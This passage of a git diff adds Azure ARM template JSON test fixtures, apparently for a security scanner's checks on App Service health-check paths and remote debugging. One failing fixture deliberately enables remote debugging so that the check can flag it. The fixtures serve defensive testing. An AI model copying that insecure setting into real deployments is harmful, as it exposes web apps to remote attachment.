+              "physicalPath": "string",
+              "preloadEnabled": "bool",
+              "virtualDirectories": [
+                {
+                  "physicalPath": "string",
+                  "virtualPath": "string"
+                }
+              ],
+              "virtualPath": "string"
+            }
+          ],
+          "vnetName": "string",
+          "vnetPrivatePortsCount": "int",
+          "vnetRouteAllEnabled": "bool",
+          "websiteTimeZone": "string",
+          "webSocketsEnabled": "bool",
+          "windowsFxVersion": "string",
+          "xManagedServiceIdentityId": "int"
+        },
+        "storageAccountRequired": "bool",
+        "virtualNetworkSubnetId": "string",
+        "vnetContentShareEnabled": "bool",
+        "vnetImagePullEnabled": "bool",
+        "vnetRouteAllEnabled": "bool"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_AppServiceSetHealthCheck/pass.json b/tests/arm/checks/resource/example_AppServiceSetHealthCheck/pass.json
new file mode 100644
index 00000000000..07d2d1367d9
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceSetHealthCheck/pass.json
@@ -0,0 +1,330 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2022-09-01",
+      "name": "pass",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string"
+      },
+      "identity": {
+        "type": "string",
+        "userAssignedIdentities": {}
+      },
+      "properties": {
+        "clientAffinityEnabled": "bool",
+        "clientCertEnabled": "bool",
+        "clientCertExclusionPaths": "string",
+        "clientCertMode": "string",
+        "cloningInfo": {
+          "appSettingsOverrides": {},
+          "cloneCustomHostNames": "bool",
+          "cloneSourceControl": "bool",
+          "configureLoadBalancing": "bool",
+          "correlationId": "string",
+          "hostingEnvironment": "string",
+          "overwrite": "bool",
+          "sourceWebAppId": "string",
+          "sourceWebAppLocation": "string",
+          "trafficManagerProfileId": "string",
+          "trafficManagerProfileName": "string"
+        },
+        "containerSize": "int",
+        "customDomainVerificationId": "string",
+        "dailyMemoryTimeQuota": "int",
+        "enabled": "bool",
+        "hostingEnvironmentProfile": {
+          "id": "string"
+        },
+        "hostNamesDisabled": "bool",
+        "hostNameSslStates": [
+          {
+            "hostType": "string",
+            "name": "string",
+            "sslState": "string",
+            "thumbprint": "string",
+            "toUpdate": "bool",
+            "virtualIP": "string"
+          }
+        ],
+        "httpsOnly": true,
+        "hyperV": "bool",
+        "isXenon": "bool",
+        "keyVaultReferenceIdentity": "string",
+        "managedEnvironmentId": "string",
+        "publicNetworkAccess": "string",
+        "redundancyMode": "string",
+        "reserved": "bool",
+        "scmSiteAlsoStopped": "bool",
+        "serverFarmId": "string",
+        "siteConfig": {
+          "acrUseManagedIdentityCreds": "bool",
+          "acrUserManagedIdentityID": "string",
+          "alwaysOn": "bool",
+          "apiDefinition": {
+            "url": "string"
+          },
+          "apiManagementConfig": {
+            "id": "string"
+          },
+          "appCommandLine": "string",
+          "appSettings": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "autoHealEnabled": "bool",
+          "autoHealRules": {
+            "actions": {
+              "actionType": "string",
+              "customAction": {
+                "exe": "string",
+                "parameters": "string"
+              },
+              "minProcessExecutionTime": "string"
+            },
+            "triggers": {
+              "privateBytesInKB": "int",
+              "requests": {
+                "count": "int",
+                "timeInterval": "string"
+              },
+              "slowRequests": {
+                "count": "int",
+                "path": "string",
+                "timeInterval": "string",
+                "timeTaken": "string"
+              },
+              "slowRequestsWithPath": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "timeInterval": "string",
+                  "timeTaken": "string"
+                }
+              ],
+              "statusCodes": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "status": "int",
+                  "subStatus": "int",
+                  "timeInterval": "string",
+                  "win32Status": "int"
+                }
+              ],
+              "statusCodesRange": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "statusCodes": "string",
+                  "timeInterval": "string"
+                }
+              ]
+            }
+          },
+          "autoSwapSlotName": "string",
+          "azureStorageAccounts": {},
+          "connectionStrings": [
+            {
+              "connectionString": "string",
+              "name": "string",
+              "type": "string"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": [
+              "is try string to app service disallow cors"
+            ],
+            "supportCredentials": "bool"
+          },
+          "defaultDocuments": [
+            "string"
+          ],
+          "detailedErrorLoggingEnabled": "bool",
+          "documentRoot": "string",
+          "elasticWebAppScaleLimit": "int",
+          "experiments": {
+            "rampUpRules": [
+              {
+                "actionHostName": "string",
+                "changeDecisionCallbackUrl": "string",
+                "changeIntervalInMinutes": "int",
+                "changeStep": "int",
+                "maxReroutePercentage": "int",
+                "minReroutePercentage": "int",
+                "name": "string",
+                "reroutePercentage": "int"
+              }
+            ]
+          },
+          "ftpsState": "string",
+          "functionAppScaleLimit": "int",
+          "functionsRuntimeScaleMonitoringEnabled": "bool",
+          "handlerMappings": [
+            {
+              "arguments": "string",
+              "extension": "string",
+              "scriptProcessor": "string"
+            }
+          ],
+          "healthCheckPath": "/somepath/",
+          "http20Enabled": "bool",
+          "httpLoggingEnabled": "bool",
+          "ipSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "ipSecurityRestrictionsDefaultAction": "string",
+          "javaContainer": "string",
+          "javaContainerVersion": "string",
+          "javaVersion": "string",
+          "keyVaultReferenceIdentity": "string",
+          "limits": {
+            "maxDiskSizeInMb": "int",
+            "maxMemoryInMb": "int",
+            "maxPercentageCpu": "int"
+          },
+          "linuxFxVersion": "string",
+          "loadBalancing": "string",
+          "localMySqlEnabled": "bool",
+          "logsDirectorySizeLimit": "int",
+          "managedPipelineMode": "string",
+          "managedServiceIdentityId": "int",
+          "metadata": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "minimumElasticInstanceCount": "int",
+          "minTlsVersion": "string",
+          "netFrameworkVersion": "string",
+          "nodeVersion": "string",
+          "numberOfWorkers": "int",
+          "phpVersion": "string",
+          "powerShellVersion": "string",
+          "preWarmedInstanceCount": "int",
+          "publicNetworkAccess": "string",
+          "publishingUsername": "string",
+          "push": {
+            "kind": "string",
+            "properties": {
+              "dynamicTagsJson": "string",
+              "isPushEnabled": "bool",
+              "tagsRequiringAuth": "string",
+              "tagWhitelistJson": "string"
+            }
+          },
+          "pythonVersion": "string",
+          "remoteDebuggingEnabled": false,
+          "remoteDebuggingVersion": "string",
+          "requestTracingEnabled": "bool",
+          "requestTracingExpirationTime": "string",
+          "scmIpSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "scmIpSecurityRestrictionsDefaultAction": "string",
+          "scmIpSecurityRestrictionsUseMain": "bool",
+          "scmMinTlsVersion": "string",
+          "scmType": "string",
+          "tracingOptions": "string",
+          "use32BitWorkerProcess": "bool",
+          "virtualApplications": [
+            {
+              "physicalPath": "string",
+              "preloadEnabled": "bool",
+              "virtualDirectories": [
+                {
+                  "physicalPath": "string",
+                  "virtualPath": "string"
+                }
+              ],
+              "virtualPath": "string"
+            }
+          ],
+          "vnetName": "string",
+          "vnetPrivatePortsCount": "int",
+          "vnetRouteAllEnabled": "bool",
+          "websiteTimeZone": "string",
+          "webSocketsEnabled": "bool",
+          "windowsFxVersion": "string",
+          "xManagedServiceIdentityId": "int"
+        },
+        "storageAccountRequired": "bool",
+        "virtualNetworkSubnetId": "string",
+        "vnetContentShareEnabled": "bool",
+        "vnetImagePullEnabled": "bool",
+        "vnetRouteAllEnabled": "bool"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_AppServiceSetHealthCheck/pass2.json b/tests/arm/checks/resource/example_AppServiceSetHealthCheck/pass2.json
new file mode 100644
index 00000000000..01a5fbee61a
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceSetHealthCheck/pass2.json
@@ -0,0 +1,330 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites/slots",
+      "apiVersion": "2022-09-01",
+      "name": "pass2",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string"
+      },
+      "identity": {
+        "type": "string",
+        "userAssignedIdentities": {}
+      },
+      "properties": {
+        "clientAffinityEnabled": "bool",
+        "clientCertEnabled": "bool",
+        "clientCertExclusionPaths": "string",
+        "clientCertMode": "string",
+        "cloningInfo": {
+          "appSettingsOverrides": {},
+          "cloneCustomHostNames": "bool",
+          "cloneSourceControl": "bool",
+          "configureLoadBalancing": "bool",
+          "correlationId": "string",
+          "hostingEnvironment": "string",
+          "overwrite": "bool",
+          "sourceWebAppId": "string",
+          "sourceWebAppLocation": "string",
+          "trafficManagerProfileId": "string",
+          "trafficManagerProfileName": "string"
+        },
+        "containerSize": "int",
+        "customDomainVerificationId": "string",
+        "dailyMemoryTimeQuota": "int",
+        "enabled": "bool",
+        "hostingEnvironmentProfile": {
+          "id": "string"
+        },
+        "hostNamesDisabled": "bool",
+        "hostNameSslStates": [
+          {
+            "hostType": "string",
+            "name": "string",
+            "sslState": "string",
+            "thumbprint": "string",
+            "toUpdate": "bool",
+            "virtualIP": "string"
+          }
+        ],
+        "httpsOnly": "bool",
+        "hyperV": "bool",
+        "isXenon": "bool",
+        "keyVaultReferenceIdentity": "string",
+        "managedEnvironmentId": "string",
+        "publicNetworkAccess": "string",
+        "redundancyMode": "string",
+        "reserved": "bool",
+        "scmSiteAlsoStopped": "bool",
+        "serverFarmId": "string",
+        "siteConfig": {
+          "acrUseManagedIdentityCreds": "bool",
+          "acrUserManagedIdentityID": "string",
+          "alwaysOn": "bool",
+          "apiDefinition": {
+            "url": "string"
+          },
+          "apiManagementConfig": {
+            "id": "string"
+          },
+          "appCommandLine": "string",
+          "appSettings": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "autoHealEnabled": "bool",
+          "autoHealRules": {
+            "actions": {
+              "actionType": "string",
+              "customAction": {
+                "exe": "string",
+                "parameters": "string"
+              },
+              "minProcessExecutionTime": "string"
+            },
+            "triggers": {
+              "privateBytesInKB": "int",
+              "requests": {
+                "count": "int",
+                "timeInterval": "string"
+              },
+              "slowRequests": {
+                "count": "int",
+                "path": "string",
+                "timeInterval": "string",
+                "timeTaken": "string"
+              },
+              "slowRequestsWithPath": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "timeInterval": "string",
+                  "timeTaken": "string"
+                }
+              ],
+              "statusCodes": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "status": "int",
+                  "subStatus": "int",
+                  "timeInterval": "string",
+                  "win32Status": "int"
+                }
+              ],
+              "statusCodesRange": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "statusCodes": "string",
+                  "timeInterval": "string"
+                }
+              ]
+            }
+          },
+          "autoSwapSlotName": "string",
+          "azureStorageAccounts": {},
+          "connectionStrings": [
+            {
+              "connectionString": "string",
+              "name": "string",
+              "type": "string"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": [
+              "string"
+            ],
+            "supportCredentials": "bool"
+          },
+          "defaultDocuments": [
+            "string"
+          ],
+          "detailedErrorLoggingEnabled": "bool",
+          "documentRoot": "string",
+          "elasticWebAppScaleLimit": "int",
+          "experiments": {
+            "rampUpRules": [
+              {
+                "actionHostName": "string",
+                "changeDecisionCallbackUrl": "string",
+                "changeIntervalInMinutes": "int",
+                "changeStep": "int",
+                "maxReroutePercentage": "int",
+                "minReroutePercentage": "int",
+                "name": "string",
+                "reroutePercentage": "int"
+              }
+            ]
+          },
+          "ftpsState": "string",
+          "functionAppScaleLimit": "int",
+          "functionsRuntimeScaleMonitoringEnabled": "bool",
+          "handlerMappings": [
+            {
+              "arguments": "string",
+              "extension": "string",
+              "scriptProcessor": "string"
+            }
+          ],
+          "healthCheckPath": "/somepath/",
+          "http20Enabled": "bool",
+          "httpLoggingEnabled": "bool",
+          "ipSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "ipSecurityRestrictionsDefaultAction": "string",
+          "javaContainer": "string",
+          "javaContainerVersion": "string",
+          "javaVersion": "string",
+          "keyVaultReferenceIdentity": "string",
+          "limits": {
+            "maxDiskSizeInMb": "int",
+            "maxMemoryInMb": "int",
+            "maxPercentageCpu": "int"
+          },
+          "linuxFxVersion": "string",
+          "loadBalancing": "string",
+          "localMySqlEnabled": "bool",
+          "logsDirectorySizeLimit": "int",
+          "managedPipelineMode": "string",
+          "managedServiceIdentityId": "int",
+          "metadata": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "minimumElasticInstanceCount": "int",
+          "minTlsVersion": "string",
+          "netFrameworkVersion": "string",
+          "nodeVersion": "string",
+          "numberOfWorkers": "int",
+          "phpVersion": "string",
+          "powerShellVersion": "string",
+          "preWarmedInstanceCount": "int",
+          "publicNetworkAccess": "string",
+          "publishingUsername": "string",
+          "push": {
+            "kind": "string",
+            "properties": {
+              "dynamicTagsJson": "string",
+              "isPushEnabled": "bool",
+              "tagsRequiringAuth": "string",
+              "tagWhitelistJson": "string"
+            }
+          },
+          "pythonVersion": "string",
+          "remoteDebuggingEnabled": "bool",
+          "remoteDebuggingVersion": "string",
+          "requestTracingEnabled": "bool",
+          "requestTracingExpirationTime": "string",
+          "scmIpSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "scmIpSecurityRestrictionsDefaultAction": "string",
+          "scmIpSecurityRestrictionsUseMain": "bool",
+          "scmMinTlsVersion": "string",
+          "scmType": "string",
+          "tracingOptions": "string",
+          "use32BitWorkerProcess": "bool",
+          "virtualApplications": [
+            {
+              "physicalPath": "string",
+              "preloadEnabled": "bool",
+              "virtualDirectories": [
+                {
+                  "physicalPath": "string",
+                  "virtualPath": "string"
+                }
+              ],
+              "virtualPath": "string"
+            }
+          ],
+          "vnetName": "string",
+          "vnetPrivatePortsCount": "int",
+          "vnetRouteAllEnabled": "bool",
+          "websiteTimeZone": "string",
+          "webSocketsEnabled": "bool",
+          "windowsFxVersion": "string",
+          "xManagedServiceIdentityId": "int"
+        },
+        "storageAccountRequired": "bool",
+        "virtualNetworkSubnetId": "string",
+        "vnetContentShareEnabled": "bool",
+        "vnetImagePullEnabled": "bool",
+        "vnetRouteAllEnabled": "bool"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_AppServiceSlotDebugDisabled/fail.json b/tests/arm/checks/resource/example_AppServiceSlotDebugDisabled/fail.json
new file mode 100644
index 00000000000..5a71a8d0e12
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceSlotDebugDisabled/fail.json
@@ -0,0 +1,330 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2022-09-01",
+      "name": "fail",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string"
+      },
+      "identity": {
+        "type": "string",
+        "userAssignedIdentities": {}
+      },
+      "properties": {
+        "clientAffinityEnabled": "bool",
+        "clientCertEnabled": "bool",
+        "clientCertExclusionPaths": "string",
+        "clientCertMode": "string",
+        "cloningInfo": {
+          "appSettingsOverrides": {},
+          "cloneCustomHostNames": "bool",
+          "cloneSourceControl": "bool",
+          "configureLoadBalancing": "bool",
+          "correlationId": "string",
+          "hostingEnvironment": "string",
+          "overwrite": "bool",
+          "sourceWebAppId": "string",
+          "sourceWebAppLocation": "string",
+          "trafficManagerProfileId": "string",
+          "trafficManagerProfileName": "string"
+        },
+        "containerSize": "int",
+        "customDomainVerificationId": "string",
+        "dailyMemoryTimeQuota": "int",
+        "enabled": "bool",
+        "hostingEnvironmentProfile": {
+          "id": "string"
+        },
+        "hostNamesDisabled": "bool",
+        "hostNameSslStates": [
+          {
+            "hostType": "string",
+            "name": "string",
+            "sslState": "string",
+            "thumbprint": "string",
+            "toUpdate": "bool",
+            "virtualIP": "string"
+          }
+        ],
+        "httpsOnly": "bool",
+        "hyperV": "bool",
+        "isXenon": "bool",
+        "keyVaultReferenceIdentity": "string",
+        "managedEnvironmentId": "string",
+        "publicNetworkAccess": "string",
+        "redundancyMode": "string",
+        "reserved": "bool",
+        "scmSiteAlsoStopped": "bool",
+        "serverFarmId": "string",
+        "siteConfig": {
+          "acrUseManagedIdentityCreds": "bool",
+          "acrUserManagedIdentityID": "string",
+          "alwaysOn": "bool",
+          "apiDefinition": {
+            "url": "string"
+          },
+          "apiManagementConfig": {
+            "id": "string"
+          },
+          "appCommandLine": "string",
+          "appSettings": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "autoHealEnabled": "bool",
+          "autoHealRules": {
+            "actions": {
+              "actionType": "string",
+              "customAction": {
+                "exe": "string",
+                "parameters": "string"
+              },
+              "minProcessExecutionTime": "string"
+            },
+            "triggers": {
+              "privateBytesInKB": "int",
+              "requests": {
+                "count": "int",
+                "timeInterval": "string"
+              },
+              "slowRequests": {
+                "count": "int",
+                "path": "string",
+                "timeInterval": "string",
+                "timeTaken": "string"
+              },
+              "slowRequestsWithPath": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "timeInterval": "string",
+                  "timeTaken": "string"
+                }
+              ],
+              "statusCodes": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "status": "int",
+                  "subStatus": "int",
+                  "timeInterval": "string",
+                  "win32Status": "int"
+                }
+              ],
+              "statusCodesRange": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "statusCodes": "string",
+                  "timeInterval": "string"
+                }
+              ]
+            }
+          },
+          "autoSwapSlotName": "string",
+          "azureStorageAccounts": {},
+          "connectionStrings": [
+            {
+              "connectionString": "string",
+              "name": "string",
+              "type": "string"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": [
+              "is try string to app service disallow cors"
+            ],
+            "supportCredentials": "bool"
+          },
+          "defaultDocuments": [
+            "string"
+          ],
+          "detailedErrorLoggingEnabled": "bool",
+          "documentRoot": "string",
+          "elasticWebAppScaleLimit": "int",
+          "experiments": {
+            "rampUpRules": [
+              {
+                "actionHostName": "string",
+                "changeDecisionCallbackUrl": "string",
+                "changeIntervalInMinutes": "int",
+                "changeStep": "int",
+                "maxReroutePercentage": "int",
+                "minReroutePercentage": "int",
+                "name": "string",
+                "reroutePercentage": "int"
+              }
+            ]
+          },
+          "ftpsState": "string",
+          "functionAppScaleLimit": "int",
+          "functionsRuntimeScaleMonitoringEnabled": "bool",
+          "handlerMappings": [
+            {
+              "arguments": "string",
+              "extension": "string",
+              "scriptProcessor": "string"
+            }
+          ],
+          "healthCheckPath": "string",
+          "http20Enabled": "bool",
+          "httpLoggingEnabled": "bool",
+          "ipSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "ipSecurityRestrictionsDefaultAction": "string",
+          "javaContainer": "string",
+          "javaContainerVersion": "string",
+          "javaVersion": "string",
+          "keyVaultReferenceIdentity": "string",
+          "limits": {
+            "maxDiskSizeInMb": "int",
+            "maxMemoryInMb": "int",
+            "maxPercentageCpu": "int"
+          },
+          "linuxFxVersion": "string",
+          "loadBalancing": "string",
+          "localMySqlEnabled": "bool",
+          "logsDirectorySizeLimit": "int",
+          "managedPipelineMode": "string",
+          "managedServiceIdentityId": "int",
+          "metadata": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "minimumElasticInstanceCount": "int",
+          "minTlsVersion": "string",
+          "netFrameworkVersion": "string",
+          "nodeVersion": "string",
+          "numberOfWorkers": "int",
+          "phpVersion": "string",
+          "powerShellVersion": "string",
+          "preWarmedInstanceCount": "int",
+          "publicNetworkAccess": "string",
+          "publishingUsername": "string",
+          "push": {
+            "kind": "string",
+            "properties": {
+              "dynamicTagsJson": "string",
+              "isPushEnabled": "bool",
+              "tagsRequiringAuth": "string",
+              "tagWhitelistJson": "string"
+            }
+          },
+          "pythonVersion": "string",
+          "remoteDebuggingEnabled": true,
+          "remoteDebuggingVersion": "string",
+          "requestTracingEnabled": "bool",
+          "requestTracingExpirationTime": "string",
+          "scmIpSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "scmIpSecurityRestrictionsDefaultAction": "string",
+          "scmIpSecurityRestrictionsUseMain": "bool",
+          "scmMinTlsVersion": "string",
+          "scmType": "string",
+          "tracingOptions": "string",
+          "use32BitWorkerProcess": "bool",
+          "virtualApplications": [
+            {
+              "physicalPath": "string",
+              "preloadEnabled": "bool",
+              "virtualDirectories": [
+                {
+                  "physicalPath": "string",
+                  "virtualPath": "string"
+                }
+              ],
+              "virtualPath": "string"
+            }
+          ],
+          "vnetName": "string",
+          "vnetPrivatePortsCount": "int",
+          "vnetRouteAllEnabled": "bool",
+          "websiteTimeZone": "string",
+          "webSocketsEnabled": "bool",
+          "windowsFxVersion": "string",
+          "xManagedServiceIdentityId": "int"
+        },
+        "storageAccountRequired": "bool",
+        "virtualNetworkSubnetId": "string",
+        "vnetContentShareEnabled": "bool",
+        "vnetImagePullEnabled": "bool",
+        "vnetRouteAllEnabled": "bool"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_AppServiceSlotDebugDisabled/fail2.json b/tests/arm/checks/resource/example_AppServiceSlotDebugDisabled/fail2.json
new file mode 100644
index 00000000000..632185adb93
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceSlotDebugDisabled/fail2.json
@@ -0,0 +1,250 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+  "type": "Microsoft.Web/sites/slots",
+  "apiVersion": "2022-09-01",
+  "name": "fail2",
+  "location": "string",
+  "tags": {
+    "tagName1": "tagValue1",
+    "tagName2": "tagValue2"
+  },
+  "kind": "string",
+  "extendedLocation": {
+    "name": "string"
+  },
+  "properties": {
+    "clientAffinityEnabled": "bool",
+    "cloningInfo": {
+      "appSettingsOverrides": {},
+      "cloneCustomHostNames": "bool",
+      "cloneSourceControl": "bool",
+      "configureLoadBalancing": "bool",
+      "correlationId": "string",
+      "hostingEnvironment": "string",
+      "overwrite": "bool",
+      "sourceWebAppId": "string",
+      "sourceWebAppLocation": "string",
+      "trafficManagerProfileId": "string",
+      "trafficManagerProfileName": "string"
+    },
+    "containerSize": "int",
+    "customDomainVerificationId": "string",
+    "dailyMemoryTimeQuota": "int",
+    "enabled": "bool",
+    "hostingEnvironmentProfile": {
+      "id": "string"
+    },
+    "hostNamesDisabled": "bool",
+    "httpsOnly": "bool",
+    "hyperV": "bool",
+    "isXenon": "bool",
+    "serverFarmId": "string",
+    "siteConfig": {
+      "acrUseManagedIdentityCreds": "bool",
+      "acrUserManagedIdentityID": "string",
+      "alwaysOn": "bool",
+      "apiDefinition": {
+        "url": "string"
+      },
+      "apiManagementConfig": {
+        "id": "string"
+      },
+      "appCommandLine": "string",
+      "appSettings": [
+        {
+          "name": "string",
+          "value": "string"
+        }
+      ],
+      "autoHealEnabled": "bool",
+      "autoHealRules": {
+        "actions": {
+          "actionType": "string",
+          "customAction": {
+            "exe": "string",
+            "parameters": "string"
+          },
+          "minProcessExecutionTime": "string"
+        }
+      },
+      "autoSwapSlotName": "string",
+      "azureStorageAccounts": {},
+      "connectionStrings": [
+        {
+          "connectionString": "string",
+          "name": "string",
+          "type": "string"
+        }
+      ],
+      "cors": {
+        "allowedOrigins": [ "string" ],
+        "supportCredentials": "bool"
+      },
+      "defaultDocuments": [ "string" ],
+      "detailedErrorLoggingEnabled": "bool",
+      "documentRoot": "string",
+      "elasticWebAppScaleLimit": "int",
+      "experiments": {
+        "rampUpRules": [
+          {
+            "actionHostName": "string",
+            "changeDecisionCallbackUrl": "string",
+            "changeIntervalInMinutes": "int",
+            "changeStep": "int",
+            "maxReroutePercentage": "int",
+            "minReroutePercentage": "int",
+            "name": "string",
+            "reroutePercentage": "int"
+          }
+        ]
+      },
+      "ftpsState": "string",
+      "functionAppScaleLimit": "int",
+      "functionsRuntimeScaleMonitoringEnabled": "bool",
+      "handlerMappings": [
+        {
+          "arguments": "string",
+          "extension": "string",
+          "scriptProcessor": "string"
+        }
+      ],
+      "healthCheckPath": "string",
+      "http20Enabled": "bool",
+      "httpLoggingEnabled": "bool",
+      "ipSecurityRestrictions": [
+        {
+          "action": "string",
+          "description": "string",
+          "headers": {},
+          "ipAddress": "string",
+          "name": "string",
+          "priority": "int",
+          "subnetMask": "string",
+          "subnetTrafficTag": "int",
+          "tag": "string",
+          "vnetSubnetResourceId": "string",
+          "vnetTrafficTag": "int"
+        }
+      ],
+      "ipSecurityRestrictionsDefaultAction": "string",
+      "javaContainer": "string",
+      "javaContainerVersion": "string",
+      "javaVersion": "string",
+      "keyVaultReferenceIdentity": "string",
+      "limits": {
+        "maxDiskSizeInMb": "int",
+        "maxMemoryInMb": "int",
+        "maxPercentageCpu": "int"
+      },
+      "linuxFxVersion": "string",
+      "loadBalancing": "string",
+      "localMySqlEnabled": "bool",
+      "logsDirectorySizeLimit": "int",
+      "managedPipelineMode": "string",
